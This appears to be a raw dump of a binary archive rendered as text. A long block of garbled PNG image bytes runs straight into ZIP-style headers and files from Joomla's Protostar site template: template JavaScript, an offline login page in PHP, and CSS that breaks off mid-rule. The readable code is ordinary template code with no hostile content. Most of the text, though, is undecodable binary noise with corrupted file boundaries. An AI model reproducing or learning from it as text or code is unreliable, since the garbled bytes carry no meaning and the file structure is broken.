IHDR����0�IDATx�	l\׹�O��DI���DqF\�3"g˥��ɱi-)��ME���R��,�b1��cXNd'HTO��g
�yz���^�D�(��Uy�$l�A�Ul��}=�\~��ͽ�;�Մts�39C�Ϝ9�{��_�s������I^���G��9	�Ia@��3X��g�U�KϪgb
q�n�&yQ��l����c��T_���AGr�{��m%�2R��@�W�C�,gh�J����[t=l�����LA7����@V�jڞ:��l��3��U��~NJa@�丑�Z��x����U���[IN���IK}�0�IV�TE����c{�]���c:�Cx�@u3�?R�lj��Q� a=x kУ�a��Q!BY��**�;�bj���U�Lw�;uȦ������W��уnh[0i��+��)6z4�OrB�P��+��hZh�g� -=��C3dS��Yh}Y�T���)P����N��Z/�C�C���Ǻ�
X�����z�)��<뺾>P�B�8��F�;����׎�8yz�*����- ��=�z�K��v&���v�MD��bH<+A�I��{σ���gP��7�[tr�Js��'�Uan���FooU�|�!�CJ��P��@������	�Ǻ��I4*�¢��*'o�Z����]�Rz��X���S{Ѭh�S{�o�c��EhE�����=��[�"/��B`��YȊ(�{�����{�f�x�ys��O��V�rتP�eV�s��=��2*�k�6_�л�W��-��ȚR�H���7��S��	q�'N��B�0A����l��^�]�w�̡Yeg�=���T\ͬ�y��U��펡�q�L���Q�}$ڪ����h���N,{���^w�(|���'��P����뉥��>��Σ�b�Z�g��Q�%-�L�����?��;�b��Rc_��~I����֟��ώA4\��?��U�N,�"��Y�ި��Zu�K,�*�a�ڀ�k�������-/�7��y*�Ȝ�H
�;1�'f�����I�x����A*�Jݸ���l��Ǽ��Ue!�Ѝ+�$oTb�64�O�����x���-����#&��k��^��/�`�z��¿ߞ�.��W����]���/4#P���_�`�¢Y��W�5�5!��`�ddGVQe2c����#/^z�x��s
�����=���x�B�J�Q�z��kՎs��dv��F_��~��O�|�Ǻ�
���1�P2]OX��4�"n��#��A���S�*KAJ{��PR9'�3sC7��F�֦��5*�f���S\W!p7�S�[�vuQ�������尼J��W����|�

ka���~��F_�H펫u���O~ك����^�`�˓BO`R�9��W��9·-T��q���Y��d��qq�S�=���B|�F�Y�G4+~��ww�T���I������e��I��}�ș�q�C�V�o���HKGn=�U�b���Z��s /.*
�bN�M���O�[�YiqV�Yzn�U��('fG�v\:����-�eE?�N�]l�d��n^���.�F���N�h=�o�M�7}�[�Bd����Q��;���\ն�q��k�#q��[��N�u�A��_o����'V�A(�>:272��(����*��9W���':�=������7�~PD(G����ٱ�k�c|WA���@un�R~`���F_/�"E4��q	��U�rc��d�wQ��^�e���:LM��V���45Mu��֪�F��;~�Y�U��A�Vч�}�柯ZA���s;ٷ՞��,��	h���r4u���s�d����c}Km����2-��xH�� �C�p��������p8�UgU����p8�UgU����p8�U����J$�c�!d@��b$V89)/b2��>iO	��
P4�תN��ӏK1^��\WG���+�壾�Iy�H����N=u`R����k�-&����H�B����fVi|��S�j�jo5&9���҇g�g��킇j�b_K}������>+ҍ�����Q��`D�k��]�B����QE�z�ݐS`��\z��@�
��h|]pQ*G��FEȬ�V��:2�!�0xz������
�~����c�7�clU�X��2t(x�Og�����UK����v(������U��{�����І�T�ꟃ=���w��rze�Ɛ>i�On�F��4��L?�[5dT2��U
��Q��XEh�������=6*�@�4���A}���1�'���%�A��A�>!}�wJ��^��M����	����ͦV�Z E�A^_��y���4,^#�������m8w ��w#���3Է-�&�.��I�8|��z+�*UcV�U�˾1g�����qA�;~�>g��� ��Y�����Ъ��|}H/�3��7��c�C$�<�~�[D�G��6��]�Ϸ?	^ԝ��t-y=%�g��x�׳�]]C�2v!�n�tJ�8�MnМ��1�$������~.�ç�ӝ���!�"�V%�Z�5Йl99�T=.g5��}��
��2�f���A��0����mԷ�-�������X�7<�<'�	꓇6-��x��*��Q��0%(�x�Z��zX�xH��
S�Ё�r�����=���B�O����
�tY���e�U!���я��[H��ꑭ�9��P�Z4b# �������#�P/��zH@?�_=�껕j��=b	;uw�Y�><�o�6��J���^��b�׌{V���&��6�׃���Ͱ>������1��b���Ws��"(C���>�B�V����>�Y����Y�c?�P!�?O�X����>x�����^R�1zT�@ҚgX�����c��S�>ȕ��ڑG�!\�ƣ�ʭ*�F�8r~�G��gzF��$�kS���Y}dGTYe��%����V�#��qIj3@Mp77ڞcZ��*��[nU���{t��`R/�{/nT�����F��)9��T�T��	�OM��Mrӵ�M��|����f�!P����p�-i���*$����1z��1z��}`Oş��-Т�ǧn�޷ލ�{
!}�_����W8����-0Ur˭j��*Nj���!��5M��8V6�L�)H񹯁��S=Ҵ�@�I��˷ϭ������)񔩾Σ�'�Q'������}��o,��N�ti�?{�#�������DԚ�#M~�	�*X��Y�>�y���_q�� \�����h��{ê�A����_��)��*�R){9M���Zߠ�͜����; ����ez�Ï8���U�rV{nR��ώų�sL��}W��}���[u���
��9^?v��w\2Ϲ�a4��{����,+"�������GU4��
D�h&#����Z>g�O@�ϛ� �*G׾>�J_������v}���1-߲���A�|a	�~�Far���I��K��]��p8�UgU����p8�UgU����p8�UgU����p8�J �S�Q_Q�����Zi�
i1�N`�m������[@؜=�����x�c�x����`Ѱ2[^�j}�x��>.���r�!�"�����컔F��o;v�#C��kh9p҃��nəl����iŊ,
+8*i}�1�'���G������ѓ��9S���ܬy(A[��n�U1�$Pg�g�
��W�`ӍM�Ï؄fXw��A�o{�}��� ��C]����|<v�M#��
��'��(h�=ј�>��򺰊9���Ga�K�3r)��74k��n�U�
��`ND^��&B�q�H懣��K '�ff]�Yf�~I�_:������.6kFc����)߂�x��>�(6�Ѱ�!�ʮ���=+B��E����R�Iϛ��VE�a�g�G/��]%�a��<>�K}&"����}��L" �:�B�(V�[�qw
�u��w�������A�!��Uъ���Yၟt,�0�gѪc�R�Iϛ��V%u�e���M&TSӳc�cS���ߡ��1���t�����
��Oi	Y��ň`��U�S5 ~�F&��ka��P�`3�D����{r�[ʨx��l�Y2vf�c�U�j���chD}�wl�'zqd�;q��?��ŭ��Z�Ѓ��Up���U��!?�=���Po�ڧj�W~��O���d@V�e�jO*�^$bh�-/0�ӿgB
��ǁZ_F�F���"�տ}T��j��c{������2)d!����D�_4@��l�O%�wʃm'�	�U��a8�V&�h��Y�`��>��2��X{{����l�Ge����|^�Y�.h�C���-/DekU������U��~�]�yF�d�;4e�.��-���>���_����}'8VjU9�Z~S̼%l����4�NJ��k�,�&�ۘ��Yh}+
���^�Yɨ�Yy��Ъ~N~�h�X��1y�; �J����fa���
;.y����
$q���]?�K��)���J�ڱ��;����ܭ�5��*�*Sk��t�EĈ�w�m�K�DX��jjT2�ƨ�U��*HpC����G0D�3
��+L�0q���'���_x����C���耒�ƒ̗���B��� ��0)Q���Q	���Wت>�U��8}ؓF$���Ԩ��$�ܪ:=��:$�f��0L>S���J�����IGx@�}h��v9��V�����i�e4RҦ�R2��V�	*��	�m}X�Z�Y�̪Ɛ�2�27��T$����[+R���V�dm��ۏFe�%�Q�¤=iӃ���	�Jo����R�b�z�AШ�G'�'w���pVu8�U�����pVu8�U����p8�:gU��YU6Q�*s�t8B���D�?N�2��tQ}M���*�Uy]^$=�p7�q)VD��T�Q�U�6w�Q�^9��JtCN}u����J�UK�C��I�Iǫt�c�T��*a�9�d�䰁�"&X��v;jP/����A��V�e�����F��B��I�"8��i�J�F|�W�Օ�7bDM�2;64?�栈GNfC��T�B�,sŤJ�QZ�=H׉���*�ȣy�,B���#�7*�tA�l�m빡���N�U��"�
 �jO���}�S{�QV��+@��Š��c[兆-=�b�/B
�Y�e �#�U(�ٴ�b���	��\K`+fMjD`�����,����z�|Eij�ghT�w�ͺ�g�Dr2�k�+W��pzQ�a'���x������)�|i3��\���UNbVv�&����p�	���ńb(Ed�&V%�%�e�Lfl[0�3��.��l�LC����^�iO:���B��*=���7ޮ�-�T�ώSr�q����\ ����o�}S�)�����mT�AzLX�,,v�3m"�@?#��N����S^�M�jO*��
�JZ㣬� %H�bx��J]�3�F����N�iOC���>c%(=�0�`��W]�t9
��}Uh�A����cOA�դd�P����:��>�TNiG��������˙汞�
j�ߍ�Px@��̄��|�"��Q��J����l5�J]���z�V:��=���1��Q��/��ÐG��3��[�>^5�)6�l��Մ>�a��A�ͳ�wA/��SӐ�;��UKн�ܺ��s�`'� ifUҚ�v��3V�rA2u�j�5�́�H=_+�r��/��l3V��_��Q��{Q���b�ک{N�8�~]Y���E9��;<h�P�����o��2�Ĺ�Т�����S{��dT]��6\z;'�l귽�UIkzԥ�Z=c%�����*4�ݪ��3B"�|�l��F*D�_��*�%�W\Z�x�¨H�ĬĞ
4�k'��A�K��򤈣�����[��I���i��x��4Ȋ�z�G���DL�(啎�=�ĸ73����(HX� jw��p���Vž�'�z�V6Z��%ퟵ1k%��
P����Q���-���V�24��I5	���y�W�+����'	�S	)h���Tc@�Az�g
���|�Hmח֪~ڃ�%�:��QVz�8��"��V��j4�D�Z�j�^oV֨5�n�
}<c?�8��������e����6��ɨ����l�f!�ap�8�Ïz���zHc���z��TeTzf��!��Q�z��2��A+du�J��Ĩ�gke��LPD��-?��:!B&q������spB8p홇��0tjzd��:pmǥ�i�e�i8������U�iԪ�=qG� y��#�n��y�2u.��КE*�$
���h��u���]e��QI��o?^�cr����f��o�탶Zi�~�KaP�{�Rz �Gk��ެп,yw�*뉌¸��S�-�FzJ/^,�s�P~Ɵ@��:�f������'+8�:�X�Z����.-w8�U�����pVu8�U�����pVu8�U�����j��G���z���>IU��u�a��X����Y�9���[>���OO�Y�4�=�R��ׯ>�W��zE6Y�Z �����}v�I��3�x���[��'���^�dEz��
�ש|��ե��p�5��vj�{������Y�~j��?!��m��5f�A�ϊ��J_��7�g��d�%�K���B�y���-�|Yh[b�&��)���%=a�G����|m�мM���8��f��1z�׋��鹉���SO�/赔{���mBq'�|��PN���F/]7���m�8e��5�3��u�è*��!J�̧�d��0B�'m�zf���V��Q�Y���/��ܱY�͵�^��9��'L�}�ڵw��f��jV>��{�"���N�h�7��Tp�GdS~ZP��z��F����=VgC�{֨��s�����
�z�S�:="g6Bi�����2yk�*���)�
b�
G���,.�2�jY0r��~щ��Q�I#]X���%=a�/-��)1z���C�Aks�<Hȼ;�C6偯�]���S��p�бC���[�P�q�؅,da�>�ƖOz!�$�Z�팑���od�N�_�b� ���WJ����_I
�iiJ�Y\�[m�:'f�x�V��T��m$a}�
��^�NM/��n2}N��>�(�~v��	�C�z����v����2�%���O��c|��{�^U����`� I}`�F�������van
�
N{��MD΅��~
=�/��3=#t�..t��v����A��z�@`�̯�����^�&������}U�����HFe��F�@o+���b�P~}��.��Ȋ�O�P�=.�#+>/i��١y��2�O.5�^��CX��U������c�����ج�'�ܱ���9
�_)�
H����%��U�|z������-����9��'L�%?̿�P�[%NO��dT^O�s�ӄ��H�]��$�m�|�̓_?(��s��Q5p2�{c�K�����.���; 0*��F,9h!�$���v�7h��c_zLԍ9����i�{!��..a�K��m�'�طxdү�"+Br�B�rz����Kz�L���׳�U��z�[Jɸ|��KFO���;�Lp��$��v���[�g>QI��_գ�G���������VE`E�O�r�rʨ� �W�Z��..b�KL�q[���ob��|�`|����8���rzW��-��W]_��8
���|�b�{,��AΠ>�z:����ڋ����ְ�*���:�Rɨ3����"ֻĄ��!�H],��t�%9�}|N����s�Qi�{�ϗ_=ш���Q��{b��5\��	�]\f�x5��Q��?Qn�_�}N���O�]��O�9��ؤH�%�6�������]Y�p8�UgU����p8�:gU����p8�:gU����p8���$I�p8�XY���ڕ��5���?�+�E	��l8> �<+�8��BX0G	,~nM���$��CL��V����\���|�f
䌜IA���|���ʜ�Λ�4�c�����y��O3�2Z�,�BxH��?�z x�dr`m���6�B�ͬ$蹰#�l̻v]B���:QC��O^������:�*�z���,�ܬ+���'��G �+��?����#�ou��{v\*�5o�M7<��˚ئ;��n�)�!E��H����(YK��پ�i	h��� �Is�~��;�]+E�_���a�V�������V4Ab�SSWl�
�1w%j�|{=�X�Y)��ʀ-s�����6����_y��:��ڔ\(.&�LM?x$�,�'t��v��w��~�?q�D�<b��j:MH���:N����%��+A��0�̪P�D�A�c<({�g빭��d�‡~҃���v�_�'N��&�/_� ���"(۽��@ʨ2�</��E�R.n�fQ(nr��A~���=�u.�E�=����c;��@n�4��Gy�Z��'y5NS�����֟Ě;��}���#��Q��}�{�Em̦I l�HDP�c��,n��(㫆̭�Z���+��}�6�~G�K0ڔ~5����{��>���a�?p��C��;�=������?=�����\\(a�j*1��Hت|zn�}n瞝�j�=��qy����0�nVD#�b`��=8{9u���;�|��'0hlOelP�1��]p`��:������g6.I-$��
����S�Q�B�s� �f��9��S
�=�0��|ԃ0��qX�|�rRB$׹w�̨�DP4+��H~1�E.��/�V��"��?�;�b
p��r\�������@��=<������ƿ:��#sа�o<�(}����O{���N�S���P�v�6�_�
\��z(�qo���a��/�-��:}p���b����H�nU2*�6�f-5vk�9�kjt`ă�^��	�Q���߉>f�s�E,fV���[^[���v)�\\-�{�xv�U�?�\�Q�h'M��k�[��a:CBqkQD��9/���T��˃j�T���+��AVP��;�1ˊF�����Cbǥ� ��cn�l�8ƫG\Wƛ�	���߭�7jǫmX�f��V
���f��"�rFEl�
���K��8"�m5��ZnB��ɡL��F�}���>hQ|�!���L�
B�/^����ú%�"�˃C�iH>E(+��/����P�Uk��};4ˣY�>�4���G��|���%z�*�g��=O�&�"�QU���<���iw���G����OOV�,Ȋ��!����s�J�mp�!��Qͭ��EQ�1[Q0倾��_��X��
-"�A��+a�:&��]I���Z?��-��ym��͡���^Y�c�D��︔yU�(�v���{��p�\�w�V&Ӫ�x����l;#ΈP�qf[_5��n}IEC�����;�s�Kq��zT�_��7"��c����G�� �h�䝅�����STر��r�˒�r��Kb�N��o���鼭Ue�;戇zX��`B�^Y�'|b��ki�֗��8��q��*�he4��44w�n��}\��Q�X�e�#/;=\8'nW�{Ń]Ƕ��^S��W=(��
�4j3��W;D4ЃgWJl���D4��*Y�n��!��ˍ^!Z�q5X�0��E�O�����v��ӁLJ ������U;N�����'����ZZ��
�I�n�4�z�2w��R}����j0N�]���
tzYȃC��Ц_�kOO���fT5E�u�̍J���Y���,.V(/#cp:h�Ox>r�9�?͉b�����ó�\Yj���J����b�M�X���	| u#�5��F?�k�H�%}�7$,ۿG�N<�CG�y��;0��iF�����7��p��U������p8�U������p8�U������p8�UxU��Q8�C2;a�<gC�mQ��Xuޣ��a$�"d2�v���r��S��RV^U�E�1M�|�s�-��R�Mr���O��D8x���4�!4;a�eSx��&��T��d�I4en8I��,J��g�F*�u�uݮ�x
���&�r�Kf9�kR�~����:����Cyx��C��E���]^������+#O�����3/X�� ��۹�z��xH��z6wl9�j��Գ
��c��H>�[�F�A�ų������l�l,�W?��^^n|鱏�kyU�[�[>�I�Im����������T>�d
��3��'dS���f��.�#��Н�帄�Rp��}��������h8�V-��j�u6+XV��L�]������2��N��ah>�U��YHç��M�Edo=I������V�	=��ƅÏBO��)���B������Y�dk~��T���6{Í�i 27�y�dЖ���9ϼ����'v�UM�d�������3��<4p������������zM_5
ˑ
]�
���Jςu b��L��`�����Fo���'�R���r�_٦���G�I�P���[$}��{�"9#!|֕�f�G���#sК���Y�NP}�����O}���!m�Ov���Y''k�HL���HM7	�^�ޭ�֯f�n<q��S'�K���?}�O���[����WF���6!��L@fj�7Ӧ�mѠ�75
:��#����n�G��-��[_�h؞��w̩�h;���{���� �y�ߊ~K����"��2���k@�ʵ��&n@	��Iު��PE�+�x~T�iT8�G��h�Q��U��̳{0�?���U!�����]"��:K���w�ދ4�{���Z@�?Z�>���M4�������[���/=��Y$�_��9�@+������C-�Y%7��$N�#0��x}ت:}�}>z����S���șgzFDb�VE 1}�ʞ>xkS&�TF��Q�9�$��s�Q�#;��l
ky�n��R���l�РO�d@�8GVB��+��=_��4���{>���ߗc�o%lPk�q���A�R�)�@x�B��J�;РSˣ#/�.E��ܨo����߾�Nl��j�������m���{��yt��'��։�B��>� ��	G�՞�z4�}�'t�Q�.��w~�;J�t�Jpۓ�<1��O�B�� �3��ԗ������_DY5��n�akUy�&�Guw����k�Xɧ}˝�6��'�hP�噡y���<�Gem�_����x��}@Y�S�p<�e�Y���ݶ��[)�}�/�Jt�i���ه�l�=\����Ʌ�6��yL.Ɠ ������V��YF?�"�}�[�3��j�0�70*d�Q�ӱt�*	�~T�߀�==_y�صo�>�H�xh�K�`�$S�c~nE݋��#�C�&V��i�B�5����	�q�@B�^K��;^|Z�Y:�'vn�C����Ĥ|��&J?����ϼ	��FU������O��S{O�8~}#�+��2����W"�
%��(19Ͼ�JM��zz��.�+t����[iuĞ
�_���ǝ.3�`�^�����m�D<�������
��x^��'�z��:pr�%�U�O892�t>2w�����E2�
���}�BV�V��g�"�h���w�x����W�X�T��P���a����S���*=�4�����z9S��[������N��A[vs9Ϥ'��^*���+%c=1�Ȩ�D���֨����4�9� #v�%�L�Sh�e�ߡ�,4@+�@Ğ�
$�����;t���0Eh՝�ޮ�_/}N�'���q@Y�³m�w��d`O�$��l��z�aÛ*�N��+�v�������v��GH��B�I�ֻ��\m�s��P��®��;r\�}�w:�֨�Z�תE�뱽��~�å������&\�O�vC��f���!�qa�$L�E'fq01;!���(zYT7^���.z��MK�b(Z�����l�tD��36Wy��w\��A���맦5Fe֪�V%�3��"�a!Z�/��1hUj'$� �F�^皠��'f[��Ә)~γ�h����=���T���Y�%S�~��,�É��6��?�/���F�#�IEND�B`�PK՜�\�<p6protostar/js/template.jsnu�[���/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 * @copyright   (C) 2013 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 * @since       3.2
 */

jQuery(function($) {
	"use strict";

	$(document)
		.on('click', ".btn-group label:not(.active)", function() {
			var $label = $(this);
			var $input = $(document.getElementById($label.attr('for')));

			if ($input.prop('checked')) {
				return;
			}

			$label.closest('.btn-group').find("label").removeClass('active btn-success btn-danger btn-primary');

			var btnClass = 'primary';


			if ($input.val() != '')
			{
				var reversed = $label.closest('.btn-group').hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
			$input.prop('checked', true).trigger('change');
		})
		.on('click', '#back-top', function (e) {
			e.preventDefault();
			$("html, body").animate({scrollTop: 0}, 1000);
		})
		.on('subform-row-add', initButtonGroup)
		.on('subform-row-add', initTooltip);

	initButtonGroup();
	initTooltip();

	// Called once on domready, again when a subform row is added
	function initTooltip(event, container)
	{
		$(container || document).find('*[rel=tooltip]').tooltip();
	}

	// Called once on domready, again when a subform row is added
	function initButtonGroup(event, container)
	{
		var $container = $(container || document);

		// Turn radios into btn-group
		$container.find('.radio.btn-group label').addClass('btn');

		$container.find(".btn-group input:checked").each(function()
		{
			var $input  = $(this);
			var $label = $(document.querySelector('label[for=' + $input.attr('id') + ']'));
			var btnClass = 'primary';

			if ($input.val() != '')
			{
				var reversed = $input.parent().hasClass('btn-group-reversed');
				btnClass = ($input.val() == 0 ? !reversed : reversed) ? 'danger' : 'success';
			}

			$label.addClass('active btn-' + btnClass);
		});
	}
});
PK՜�\��A�{{protostar/js/classes.jsnu�[���// Add classes

window.onload=function() {
var input = document.getElementsByTagName("input");
for (var i = 0; i < input.length; i++) {
    if (input[i].className === 'button') {
        input[i].className = 'btn btn-primary';
    }
}

var button = document.getElementsByTagName("button");
for (var i = 0; i < input.length; i++) {
    if (button[i].className === 'button') {
        button[i].className = 'btn btn-primary';
    }
}

var p = document.getElementsByTagName("p");
for (var i = 0; i < p.length; i++) {
    if (p[i].className === 'readmore') {
        p[i].className = 'btn';
    }
}

var table = document.getElementsByTagName("table");
for (var i = 0; i < table.length; i++) {
    if (table[i].className === 'category') {
        table[i].className = 'table table-striped';
    }
}

var ul = document.getElementsByTagName("ul");
for (var i = 0; i < ul.length; i++) {
    if (ul[i].className === 'actions') {
        ul[i].className = 'nav nav-pills';
    }
}

var ul = document.getElementsByTagName("ul");
for (var i = 0; i < ul.length; i++) {
    if (ul[i].className === 'pagenav') {
        ul[i].className = 'pagination';
    }
}
};PK՜�\D�;���protostar/js/application.jsnu�[���$('.dropdown-toggle').dropdown()
$('.collapse').collapse('show')
$('#myModal').modal('hide')
$('.typeahead').typeahead()
$('.tabs').button()
$('.tip').tooltip()
$(".alert-message").alert()PK՜�\Gl����protostar/offline.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   (C) 2016 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$twofactormethods = JAuthenticationHelper::getTwoFactorMethods();
$app              = JFactory::getApplication();

// Output as HTML5
$this->setHtml5(true);

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add template js
JHtml::_('script', 'template.js', array('version' => 'auto', 'relative' => true));

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add Stylesheets
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'offline.css', array('version' => 'auto', 'relative' => true));

// Use of Google Font
if ($this->params->get('googleFont'))
{
	JHtml::_('stylesheet', 'https://fonts.googleapis.com/css?family=' . $this->params->get('googleFontName'));
	$this->addStyleDeclaration("
	h1, h2, h3, h4, h5, h6, .site-title {
		font-family: '" . str_replace('+', ' ', $this->params->get('googleFontName')) . "', sans-serif;
	}");
}

// Template color
if ($this->params->get('templateColor'))
{
	$this->addStyleDeclaration('
	body.site {
		border-top: 3px solid ' . $this->params->get('templateColor') . ';
		background-color: ' . $this->params->get('templateBackgroundColor') . ';
	}
	a {
		color: ' . $this->params->get('templateColor') . ';
	}
	.nav-list > .active > a,
	.nav-list > .active > a:hover,
	.dropdown-menu li > a:hover,
	.dropdown-menu .active > a,
	.dropdown-menu .active > a:hover,
	.nav-pills > .active > a,
	.nav-pills > .active > a:hover,
	.btn-primary {
		background: ' . $this->params->get('templateColor') . ';
	}');
}

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));

// Check for a custom js file
JHtml::_('script', 'user.js', array('version' => 'auto', 'relative' => true));

// Load optional RTL Bootstrap CSS
JHtml::_('bootstrap.loadCss', false, $this->direction);

// Logo file or site title param
$sitename = htmlspecialchars($app->get('sitename'), ENT_QUOTES, 'UTF-8');

if ($this->params->get('logoFile'))
{
	$logo = '<img src="' . htmlspecialchars(JUri::root() . $this->params->get('logoFile'), ENT_QUOTES, 'UTF-8') . '" alt="' . $sitename . '" />';
}
elseif ($this->params->get('sitetitle'))
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . htmlspecialchars($this->params->get('sitetitle')) . '</span>';
}
else
{
	$logo = '<span class="site-title" title="' . $sitename . '">' . $sitename . '</span>';
}
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
	<jdoc:include type="head" />
</head>
<body class="site">
	<div class="outer">
		<div class="middle">
			<div class="inner well">
				<div class="header">
				<?php if (!empty($logo)) : ?>
					<h1><?php echo $logo; ?></h1>
				<?php else : ?>
					<h1><?php echo $sitename; ?></h1>
				<?php endif; ?>
				<?php if ($app->get('offline_image') && file_exists($app->get('offline_image'))) : ?>
					<img src="<?php echo $app->get('offline_image'); ?>" alt="<?php echo $sitename; ?>" />
				<?php endif; ?>
				<?php if ($app->get('display_offline_message', 1) == 1 && str_replace(' ', '', $app->get('offline_message')) !== '') : ?>
					<p><?php echo $app->get('offline_message'); ?></p>
				<?php elseif ($app->get('display_offline_message', 1) == 2) : ?>
					<p><?php echo JText::_('JOFFLINE_MESSAGE'); ?></p>
				<?php endif; ?>
				</div>
				<jdoc:include type="message" />
				<form action="<?php echo JRoute::_('index.php', true); ?>" method="post" id="form-login">
					<fieldset>
						<label for="username"><?php echo JText::_('JGLOBAL_USERNAME'); ?></label>
						<input name="username" id="username" type="text" title="<?php echo JText::_('JGLOBAL_USERNAME'); ?>" />

						<label for="password"><?php echo JText::_('JGLOBAL_PASSWORD'); ?></label>
						<input type="password" name="password" id="password" title="<?php echo JText::_('JGLOBAL_PASSWORD'); ?>" />

						<?php if (count($twofactormethods) > 1) : ?>
						<label for="secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
						<input type="text" name="secretkey" autocomplete="one-time-code" id="secretkey" title="<?php echo JText::_('JGLOBAL_SECRETKEY'); ?>" />
						<?php endif; ?>

						<input type="submit" name="Submit" class="btn btn-primary" value="<?php echo JText::_('JLOGIN'); ?>" />

						<input type="hidden" name="option" value="com_users" />
						<input type="hidden" name="task" value="user.login" />
						<input type="hidden" name="return" value="<?php echo base64_encode(JUri::base()); ?>" />
						<?php echo JHtml::_('form.token'); ?>
					</fieldset>
				</form>
			</div>
		</div>
	</div>
</body>
</html>
PK՜�\��M�$�$�protostar/css/template.cssnu�[���article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
nav,
section {
	display: block;
}
audio,
canvas,
video {
	display: inline-block;
	*display: inline;
	*zoom: 1;
}
audio:not([controls]) {
	display: none;
}
html {
	font-size: 100%;
	-webkit-text-size-adjust: 100%;
	-ms-text-size-adjust: 100%;
}
a:focus {
	outline: thin dotted #333;
	outline: 5px auto -webkit-focus-ring-color;
	outline-offset: -2px;
}
a:hover,
a:active {
	outline: 0;
}
sub,
sup {
	position: relative;
	font-size: 75%;
	line-height: 0;
	vertical-align: baseline;
}
sup {
	top: -0.5em;
}
sub {
	bottom: -0.25em;
}
img {
	max-width: 100%;
	width: auto \9;
	height: auto;
	vertical-align: middle;
	border: 0;
	-ms-interpolation-mode: bicubic;
}
#map_canvas img,
.google-maps img,
.gm-style img {
	max-width: none;
}
button,
input,
select,
textarea {
	margin: 0;
	font-size: 100%;
	vertical-align: middle;
}
button,
input {
	*overflow: visible;
	line-height: normal;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
	padding: 0;
	border: 0;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
	-webkit-appearance: button;
	cursor: pointer;
}
label,
select,
button,
input[type="button"],
input[type="reset"],
input[type="submit"],
input[type="radio"],
input[type="checkbox"] {
	cursor: pointer;
}
input[type="search"] {
	-webkit-box-sizing: content-box;
	-moz-box-sizing: content-box;
	box-sizing: content-box;
	-webkit-appearance: textfield;
}
input[type="search"]::-webkit-search-decoration,
input[type="search"]::-webkit-search-cancel-button {
	-webkit-appearance: none;
}
textarea {
	overflow: auto;
	vertical-align: top;
}
@media print {
	* {
		text-shadow: none !important;
		color: #000 !important;
		background: transparent !important;
		box-shadow: none !important;
	}
	a,
	a:visited {
		text-decoration: underline;
	}
	a[href]:after {
		content: " (" attr(href) ")";
	}
	abbr[title]:after {
		content: " (" attr(title) ")";
	}
	.ir a:after,
	a[href^="javascript:"]:after,
	a[href^="#"]:after {
		content: "";
	}
	pre,
	blockquote {
		border: 1px solid #999;
		page-break-inside: avoid;
	}
	thead {
		display: table-header-group;
	}
	tr,
	img {
		page-break-inside: avoid;
	}
	img {
		max-width: 100% !important;
	}
	@page {
		margin: 0.5cm;
	}
	p,
	h2,
	h3 {
		orphans: 3;
		widows: 3;
	}
	h2,
	h3 {
		page-break-after: avoid;
	}
}
.clearfix {
	*zoom: 1;
}
.clearfix:before,
.clearfix:after {
	display: table;
	content: "";
	line-height: 0;
}
.clearfix:after {
	clear: both;
}
.hide-text {
	font: 0/0 a;
	color: transparent;
	text-shadow: none;
	background-color: transparent;
	border: 0;
}
.input-block-level {
	display: block;
	width: 100%;
	min-height: 28px;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}
body {
	margin: 0;
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
	font-size: 13px;
	line-height: 18px;
	color: #333;
	background-color: #fff;
}
a {
	color: #005e8d;
	text-decoration: none;
}
a:hover,
a:focus {
	color: #002b41;
	text-decoration: underline;
}
.img-rounded {
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.img-polaroid {
	padding: 4px;
	background-color: #fff;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	-webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.1);
	-moz-box-shadow: 0 1px 3px rgba(0,0,0,0.1);
	box-shadow: 0 1px 3px rgba(0,0,0,0.1);
}
.img-circle {
	-webkit-border-radius: 500px;
	-moz-border-radius: 500px;
	border-radius: 500px;
}
.row {
	margin-left: -20px;
	*zoom: 1;
}
.row:before,
.row:after {
	display: table;
	content: "";
	line-height: 0;
}
.row:after {
	clear: both;
}
[class*="span"] {
	float: left;
	min-height: 1px;
	margin-left: 20px;
}
.container,
.navbar-static-top .container,
.navbar-fixed-top .container,
.navbar-fixed-bottom .container {
	width: 940px;
}
.span12 {
	width: 940px;
}
.span11 {
	width: 860px;
}
.span10 {
	width: 780px;
}
.span9 {
	width: 700px;
}
.span8 {
	width: 620px;
}
.span7 {
	width: 540px;
}
.span6 {
	width: 460px;
}
.span5 {
	width: 380px;
}
.span4 {
	width: 300px;
}
.span3 {
	width: 220px;
}
.span2 {
	width: 140px;
}
.span1 {
	width: 60px;
}
.offset12 {
	margin-left: 980px;
}
.offset11 {
	margin-left: 900px;
}
.offset10 {
	margin-left: 820px;
}
.offset9 {
	margin-left: 740px;
}
.offset8 {
	margin-left: 660px;
}
.offset7 {
	margin-left: 580px;
}
.offset6 {
	margin-left: 500px;
}
.offset5 {
	margin-left: 420px;
}
.offset4 {
	margin-left: 340px;
}
.offset3 {
	margin-left: 260px;
}
.offset2 {
	margin-left: 180px;
}
.offset1 {
	margin-left: 100px;
}
.row-fluid {
